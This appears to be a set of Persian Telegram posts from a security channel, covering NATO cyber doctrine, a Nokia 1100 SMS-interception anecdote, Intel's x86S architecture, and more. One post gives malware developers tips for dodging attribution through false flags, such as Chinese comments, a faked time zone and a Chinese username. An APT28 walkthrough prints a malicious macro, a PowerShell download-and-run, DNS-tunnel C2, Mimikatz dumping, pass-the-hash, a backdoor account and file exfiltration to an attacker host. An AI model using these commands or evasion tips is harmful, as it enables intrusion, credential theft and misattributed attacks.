یک مقبره ساده ز سنگ ساخته است
بر گنبد و سیم و زر نپرداخته است
اما عجبا که نام و آوازه او
صد لرزه به شیخ و زاهد انداخته است!

[۷آبان روز بزرگداشت کوروش بزرگ خجسته باد]
@TryHackBoxStory

📌 نگاهی به دکترین و استراتژی 2022 ناتو

اکنون که بحث سایبر و سیستم های سایبرنتیک اهمیت فراوانی پیدا کرده است، در این پست به اسناد رسمی ناتو (NATO) و همچنین تغییرات و به روزرسانی آن ها نگاهی خواهیم داشت. ناتو در چندین سند رسمی به اهمیت جنگ سایبری و دفاع سایبری پرداخته و دستورالعمل‌هایی برای مقابله با تهدیدات سایبری ارائه داده است. برخی از مهم‌ترین این اسناد و اقدامات ناتو به شرح زیر هستند:

1. مفهوم استراتژیک ناتو 2010 (NATO Strategic Concept 2010): در این سند ناتو برای اولین بار به طور رسمی جنگ سایبری را به عنوان یک تهدید امنیتی مورد توجه قرار داد و بر اهمیت تقویت قابلیت‌های سایبری برای دفاع از کشورهای عضو تأکید کرد. در این سند آمده است که دفاع در برابر حملات سایبری از جمله اولویت‌های امنیتی ناتو است و تاکید شد که ناتو باید توانایی‌های خود را در این زمینه توسعه دهد.

2. سیاست دفاع سایبری ناتو (NATO Cyber Defence Policy 2014): این سند یکی از مهم‌ترین سیاست‌های ناتو در حوزه سایبری است. در این سند، ناتو تصریح می‌کند که حملات سایبری می‌توانند به اندازه حملات فیزیکی مضر باشند و هرگونه حمله سایبری بزرگ علیه کشورهای عضو ناتو ممکن است تحت ماده 5 پیمان ناتو قرار گیرد که به معنای پاسخ جمعی است. ناتو همچنین در این سند بر اهمیت هم‌افزایی میان کشورهای عضو برای تقویت دفاع سایبری و اشتراک اطلاعات تأکید می‌کند.

3. بروزرسانی‌های 2016 و 2021 در دکترین سایبری ناتو: در سال 2016، ناتو رسماً فضای سایبری را به عنوان یکی از حوزه‌های عملیاتی خود (در کنار زمین، هوا، دریا و فضا) معرفی کرد. این تصمیم نشان‌دهنده اهمیت بالای فضای سایبری در دفاع از کشورهای عضو و همچنین تهاجم‌های سایبری بود. در سال 2021، ناتو این دکترین را با توجه به پیشرفت‌های فناوری و افزایش تهدیدات سایبری بروزرسانی کرد و بر اهمیت عملیات‌های هماهنگ در فضای سایبری تاکید بیشتری شد.

4. دستورالعمل‌ها و قوانین همکاری سایبری ناتو (CCDCOE): ناتو از طریق مرکز تعالی دفاع سایبری تعاونی (CCDCOE) مستقر در استونی، مجموعه‌ای از دستورالعمل‌ها و پژوهش‌ها را درباره نحوه مقابله با تهدیدات سایبری منتشر کرده است. از جمله اسناد مهم می‌توان به کتاب Tallinn Manual اشاره کرد که راهنمایی‌هایی درباره قوانین بین‌المللی مرتبط با جنگ سایبری ارائه می‌دهد. این کتاب به کشورها کمک می‌کند تا بتوانند واکنش‌های قانونی مناسب در برابر حملات سایبری را تنظیم کنند. شایان ذکر است، راهنمای Tallinn توسط گروهی از متخصصان حقوق بین‌الملل و حقوق نظامی تهیه شده و سعی می‌کند چارچوبی برای چگونگی اعمال قوانین جنگ سنتی (مانند قوانین بین‌المللی بشردوستانه) در فضای سایبری ارائه دهد. در بخش زیر نگاهی گذرا به این راهنما داشتیم:

➖ نسخه اول (Tallinn Manual 1.0) – 2013: این نسخه بیشتر بر روی قوانین جنگ در فضای سایبری و چگونگی استفاده از قوانین بین‌المللی در مورد حملات سایبری تمرکز داشت. به‌ویژه، به موضوعاتی نظیر اینکه چه زمانی یک حمله سایبری می‌تواند به عنوان "استفاده از زور" تلقی شود و چه زمانی حملات سایبری می‌توانند به واکنش‌های نظامی یا حقوقی منجر شوند، پرداخته است.

➖ نسخه دوم (Tallinn Manual 2.0) – 2017: در این نسخه به طور گسترده‌تری به مسائل سایبری پرداخته شده است و شامل قوانین غیرنظامی مرتبط با فضای سایبری نیز می‌شود. همچنین موضوعات جدیدی مانند حفاظت از داده‌ها، امنیت سایبری، حریم خصوصی، و مسائل تجاری نیز به آن اضافه شده‌اند.

راهنمای تالین تلاش می‌کند تا روشن کند که چه نوع عملیات‌های سایبری می‌توانند به عنوان حمله نظامی در نظر گرفته شوند و چه واکنش‌هایی بر اساس قوانین بین‌المللی مجاز هستند.

5. استراتژی 2022 ناتو: با این حال، مسئله مهم تغییرات دکترین ناتو در سال 2022 با محوریت مسائل سایبری بوده است. در استراتژی جدید ناتو که در اجلاس 2022 اعلام شد، ناتو به‌صراحت به جنگ سایبری به عنوان یکی از ابزارهای جنگ هیبریدی اشاره کرد و تأکید کرد که عملیات‌های سایبری نقش حیاتی در دفاع از کشورهای عضو ناتو در برابر تهدیدات متنوع دارند. همچنین، ناتو بر تقویت توانایی‌های سایبری کشورهای عضو و مقابله با حملات پیچیده سایبری تاکید بیشتری گذاشت.

✍️ نویسنده هنگامه شایگان
@TryHackBoxStory

دوستان اگر مایل بودید میتوانید تجربه مصاحبه های خود را با ما به اشتراک بگذارید
تا در کانال به اشتراک بگذاریم
@TryHackBoxStorybot

دوستان داستان های ردتیم به زودی ...

اگر کسی از دوستان مایل هست این داستان ها را به صورت ویدئو درست کنه و همکاری با ما داشته باشه با ما در ارتباط باشه :
@TryHackBoxStorybot

📲 تلفن همراه برای رهگیری پیامک های دیگران.

• آمارهای جالبی وجود دارد که پرفروش ترین گوشی های موبایل تاریخ را نشان می دهد. رتبه اول این آمار را نوکیا 1100 به خود اختصاص داده است و مجموع فروش این گوشی از مرز 250 میلیون عبور کرده است. این یک داستان خنده دار است که در سال 2009 اتفاق افتاد ...

• در حین بررسی یک پرونده کلاهبرداری از طریق پست در هلند، پلیس به یک واقعیت بسیار جالب برخورد کرد - یک خریدار ناشناس برای یک گوشی نوکیا 1100 25 هزار یورو پرداخت کرد. و قیمت گوشی کمتر از 100 یورو بود.

• در تلاش برای یافتن اینکه چرا هکرها حاضرند برای یک دستگاه ارزان و به ظاهر غیرقابل توجه پول زیادی بپردازند، پلیس به تحقیقات جهانی پیشرفته Ultrascan مراجعه کرد. کارشناسان Ultrascan دریافته‌اند که هکرها جذب همه دستگاه‌های نوکیا 1100 نمی‌شوند، بلکه فقط دستگاه‌هایی که در کارخانه نوکیا در بوخوم (آلمان) ساخته شده‌اند جذب می‌شوند.

• این سری از دستگاه ها به دلیل مشکلاتی در نرم افزار قدیمی ایجاد شده در سال 2002 معیوب در نظر گرفته شدند. به دلیل همین "نقص"، هکرها یاد گرفتند که پیام های SMS دیگران را رهگیری کنند، به ویژه کدهای یکبار مصرف برای تراکنش های بانکی - mTAN (موبایل شماره احراز هویت تراکنش)، که بانک های اروپایی از طریق پیامک برای مشتریان خود ارسال می کنند.

• بنابراین، معلوم می شود که هکرها فقط مجبور بودند این گوشی را (بدون هیچ گونه چشمک زدنی) به یک sniffer مانند #WireShark وصل کنند و ترفند در کیف است - می توانید پیامک را رهگیری کنید و سپس پول را به حساب خود منتقل کنید.

• جالب است بدانید که در زمان وقوع این حادثه (2009) ، نوکیا بیش از 200 میلیون نسخه از نوکیا 1100 و مدل های مبتنی بر آن را در سراسر جهان فروخت، اما تعداد دستگاه های آسیب پذیر ناشناخته باقی مانده است...

✍ تهیه شده : TryHackBoxStory
@TryHackBoxStory

شب چله همگی خجسته باد

دوستان ما قصد داریم این داستان ها رو به صورت پادکست قرار بدیم تا راحت تر باشید گوش بدید در هرجایی که هستید و فرصت یا موقعیت خوندن نیست از علاقه مندان درخواست می شود در صورت تمایل به درست کردن پادکست در این خصوص به ما پیام دهند :

@TryHackBoxStorybot

قوانین APT ها برای توسعه بدافزار چیه؟

یکی از دوستان داخل لینکدین پستی در خصوص سیمبول فایل ها گذاشته  بود که به هنگام کامپایل یک قطعه کد توسط visual studio  این symbol فایل ایجاد میشه و پیشنهاد کرده بودند که برای اینکه کار تحلیل گران بدافزار و ... رو سخت تر کنیم بهتره که این مورد رو پاک کنیم.

یادم اومد چند سال پیش که تماما تمرکزم روی بدافزار و سندباکس بود، چندتا الزام یا پیش‌نیاز برای توسعه بدافزار وجود داشت که هر توسعه دهنده ای باید رعایت میکرد ، از این جهت چندتاشون رو اینجا تیتر وار میگم که شما هم گوشه ذهنتون داشته باشید
موارد بسیاره، و من تنها به دو سه مورد ابتدایی ولی مهمش اشاره میکنم.

شما باید فارنزیک سیستم عاملی که روش کد می زنید رو کامل بدونید (ویندوز، لینوکس و ..) و براساس اون بدافزار تون رو توسعه بدید ... به طور کلی ویندوز کلی Artifact  از شما در فایل های کامپایل شدتون به جا می زاره که در فاز ردیابی مهاجم استفاده خواهد شد.

مثلا هر زبانی روی سیستم تون نصب باشه، تو متادیتا های کامپایل کد بدافزار تون ی اثری ازش می افته.  یک راه حلش این بود که روی سیستم clean تون زبان چینی یا ... نصب کنید.
کدهایی که توسعه می دید رو با کامنت های چینی یا هر زبانی غیر از فارسی بذارید.
اطلاعات مربوط به تایم زون سیستم تون روی تهران نباشه.
حساب کاربری تون یا اسامی که استفاده می کنید فارسی نباشه. مثلا  mao Zedong (رهبر پیشین چین) گزینه خوبیه :)
و صد البته که روی ماشین اصلی تون که متصل به اینترنت هم هست کد توسعه نمی دید.
و از اون مهم تر تحت هیچ شرایطی ماشین رو به اینترنت وصل نمی کنید و محیط توسعه تون هم بایستی داخل یک vm باشه.
در مورد Best practice  برای ماشین های توسعه دهنده بدافزار هم اینکه هیچ وقت به اینترنت وصل نشن و تمام اپدیت ها آفلاین صورت بگیره.
و از نوت پد یا vi برای توسعه استفاده کنید ، کلا از IDE ها دوری کنید!

به هر حال توسعه بدافزار در دنیای واقعی الزامات بسیاری رو داره که بایستی حتما رعایت کنید.
و خیلی هاش رو هم نمیشه گفت! مثل سرورهای فرماندهی و کنترل تون باید کجا باشن که اگر لیک شدن به شما نرسن، یا مدارک احراز هویتی تون برای آماده سازی محیط باید از کجا و به چه شکل تهیه بشه و....

✍ منبع : os security
@TryHackBoxStory

📌 بخش اول: تغییرات ISA پردازنده‌های اینتل در معماری x86s

معماری x86 برای سال‌ها در قلب سیستم‌های کامپیوتری بوده است و این معماری با نسخه‌های بهبودیافته در پردازنده‌های اینتل مورد استفاده قرار گرفته است. در این مقاله، به بررسی معماری جدیدی که اینتل تحت عنوان x86S ارائه داده می‌پردازیم. X86S یک مجموعه دستورالعمل‌های معماری جدید و کاهش‌یافته است که از بخش‌های قدیمی و بدون استفاده معماری سنتی x86 خلاص می‌شود و طراحی آن برای مدرن‌سازی و کارایی بیشتر معماری پردازنده‌ها صورت گرفته است.

معماری ISA چیست و چرا نیاز به بهینه‌سازی دارد؟ معماری مجموعه‌ دستورالعمل‌ها یا همان Instruction Set Architecture، مجموعه‌ای از دستورالعمل‌هاست که پردازنده‌ها برای اجرای برنامه‌ها و تعامل با سخت‌افزار از آن استفاده می‌کنند. معماری x86 با گذشت زمان بخش‌های مختلفی را برای سازگاری با سیستم‌های قدیمی‌تر اضافه کرده که باعث پیچیدگی، افزایش مصرف انرژی و کاهش کارایی می‌شود. اینتل با ارائه x86S قصد دارد تا با حذف قابلیت‌های غیرضروری و قدیمی، معماری x86 را بهبود بخشیده و بهینه‌سازی کند.

✅ ویژگی‌های x86S: معماری x86S با کاهش بخش‌های قدیمی و سازگاری‌های اضافی، از ساده‌تر شدن کدهای اجرایی، کاهش پیچیدگی‌ها و مصرف منابع بهره می‌برد. این تغییرات شامل موارد زیر است:

➖ حالت‌های اجرایی قدیمی: x86S از حالت‌های اجرایی قدیمی که در معماری‌های پیشین وجود داشتند، همچون حالت واقعی 16 بیتی و حالت محافظت‌شده 32 بیتی صرف‌نظر کرده و پردازنده را به طور دائم در حالت صفحه‌بندی شده قرار می‌دهد. در نتیجه، تنها حالت 64 بیتی و حالت سازگاری 32 بیتی باقی می‌ماند.

➖ حذف حلقه‌های امنیتی پایین‌تر (Ring 1 و Ring 2): حلقه‌های امنیتی 1 و 2 در گذشته برای جدا کردن سطوح مختلف دسترسی در سیستم‌عامل‌ها استفاده می‌شد، اما امروزه بسیاری از سیستم‌عامل‌ها از این حلقه‌ها استفاده نمی‌کنند. حذف این حلقه‌ها باعث کاهش پیچیدگی و بهبود کارایی پردازنده می‌شود.

➖ حذف حالت‌های 32 بیتی و vm86 در Ring 0: حالت vm86 برای پشتیبانی از برنامه‌های قدیمی DOS و 16 بیتی طراحی شده بود. با حذف این حالت‌ها، پردازنده از پشتیبانی مستقیم برنامه‌های قدیمی بی‌نیاز می‌شود و اجرای برنامه‌های مدرن بهینه‌تر خواهد شد.

➖ حذف MTRRهای ثابت: این حذف باعث می‌شود که پردازنده به مدیریت پویا و کارآمدتری از حافظه دسترسی پیدا کند و پردازنده تنها به ساختارهای مدیریت حافظه پویا متکی باشد.

➖ حذف I/O سطح کاربر و رشته‌های I/O: با حذف این موارد، پردازنده نیازمند پشتیبانی از دستورات سطح پایین ورودی و خروجی که در برنامه‌های قدیمی استفاده می‌شدند، نیست. این کار باعث بهبود کارایی و امنیت پردازنده می‌شود.

➖ حذف و بهینه‌سازی کنترل‌ها و بیت‌های اضافی در CR0: برخی از کنترل‌های اضافی در CR0، مانند Write-Through و بیت‌های کنترل قدیمی FPU که برای پردازنده‌های اولیه طراحی شده بودند، حذف می‌شوند و این باعث کاهش سربار پردازنده و بهینه‌سازی کنترل‌ها می‌شود.

➖ حذف و بهینه‌سازی مکانیزم وقفه‌ها و کنترل‌ها: معماری x86S تنها از x2APIC برای کنترل‌کننده وقفه استفاده می‌کند و از XAPIC و کنترلرهای وقفه قدیمی پشتیبانی نمی‌کند. این تغییرات باعث کاهش مصرف انرژی و بهبود کارایی پردازنده در سیستم‌های چندپردازشی می‌شود.

➖ پشتیبانی محدود از معماری Segmentation: با وجود محدود شدن دسترسی به سگمنت‌های تقسیم‌بندی در حالت 64 بیتی، همچنان دسترسی محدود به FS و GS برای کاربردهای خاص پشتیبانی می‌شود. همچنین، برخی از ویژگی‌های تقسیم‌بندی مانند تغییر حلقه‌ها در دستورهای فراخوانی دوربرد (far call) حذف شده است.

➖ دستورات محدود برای کنترل حالت‌های اجرایی: در معماری x86S، پردازنده نمی‌تواند حالت‌های NX یا SYSCALL یا حالت 64 بیتی را در MSR EFER غیرفعال کند که باعث افزایش امنیت پردازنده می‌شود.

@TryHackBoxStory

⏲ سه سناریو واقعی از نفوذهای گروه APT28

🔹 سناریو یک: نفوذ به شبکه‌ وزارت امور خارجه آلمان با هدف جاسوسی از ارتباطات دولتی با بدافزار Seduploader

🔹 هدف:
         ✅نفوذ به سیستم‌های دیپلماتیک برای سرقت اطلاعات حساس
         ✅استقرار بدافزار برای مانیتورینگ و جمع‌آوری دیتاها
         ✅حرکت جانبی (Lateral Movement) برای گسترش حضور تو شبکه

🔹 گام 1: مهندسی اجتماعی و نفوذ اولیه
گروه APT28 از Spear Phishing برای نفوذ اولیه تو این سناریو استفاده کرده. یه ایمیل رسمی فیک به کارمندا ارسال شده که به نظر می‌رسیده از طرف یه سازمان بین‌المللی معتبر مثل EU External Action Service (EEAS) باشه.

فایل آلوده (Macro-Enabled Document)
ایمیل شامل یه فایل Word آلوده بوده که از ماکرو VBA مخرب استفاده می‌کرده. بعد از باز شدن فایل، ماکرو فعال می‌شده و PowerShell رو برای دانلود بدافزار اجرا می‌کرده:

Sub AutoOpen()
    Dim objShell As Object
    Set objShell = CreateObject("WScript.Shell")
    objShell.Run "powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File C:\Users\Public\update.ps1"
End Sub

🔹 گام دو: دانلود و پیاده‌سازی بدافزار Seduploader
فایل update.ps1 که یه اسکریپت پاورشل رمزگذاری‌شده بوده؛ بدافزار اصلی رو دانلود می‌کرده:

$download = New-Object System.Net.WebClient
$url = "https://malicious-server.com/payload.exe"
$path = "$env:APPDATA\Microsoft\Windows\update.exe"
$download.DownloadFile($url, $path)
Start-Process -FilePath $path

ویژگی‌های بدافزار Seduploader
    - بررسی سیستم: اطلاعات اولیه (مثل نسخه‌ ویندوز، یوزرنیم، پردازنده) رو جمع‌آوری می‌کنه.
    - اجرای دستورات از راه دور (Remote Command Execution)
    - ثبت کلیدهای زده‌شده (Keylogging)
    - آپلود و دانلود فایل‌های مخرب
    - استفاده از DNS Tunneling برای ارسال اطلاعات به سرور C2

ارتباط با سرور C2 با استفاده از DNS Tunneling
بدافزار Seduploader از ری‌کوئست‌های DNS برای ارسال اطلاعات به سرور C2 استفاده می‌کنه:

nslookup -type=TXT x7c9.malicious-domain.com

دیتاها به صورت Base64 یا XOR Encoding انکریپت شده‌ان.

🔹 گام سه: حرکت جانبی (Lateral Movement)
یک. Credential Dumping با استفاده از Mimikatz
بعد از استقرار اولیه، APT28 از ابزار Mimikatz برای سرقت هش‌های رمزعبور استفاده کرده:

privilege::debug
sekurlsa::logonpasswords

دو. Pass-the-Hash (PTH) برای دسترسی به سایر سیستم‌ها
اعضای APT28 با استفاده از هش‌ها به سیستم‌های دیگه متصل می‌شدن:

psexec \\target-system -u administrator -p NTLMHASH cmd.exe

سه. Pivoting با PowerShell Empire
با دسترسی به یه سیستم جدید، برای ایجاد ارتباط مستقیم، از PowerShell Empire استفاده می‌شده:

Invoke-PsExec -ComputerName target-system -Command "net user /add backdoor P@ssw0rd"

🔹 گام چهار: استخراج دیتاها (Exfiltration)
ارسال دیتاهای سرقت‌شده با پاورشل

$bytes = [System.IO.File]::ReadAllBytes("C:\sensitive_data.pdf")
Invoke-WebRequest -Uri "https://malicious-server.com/upload" -Method POST -Body $bytes

🔹 نتیجه:
اعضای گروه APT28 موفق به استخراج اطلاعات حساس دیپلماتیک شدن.

#Cyber_Warfar
@TryHackBoxStory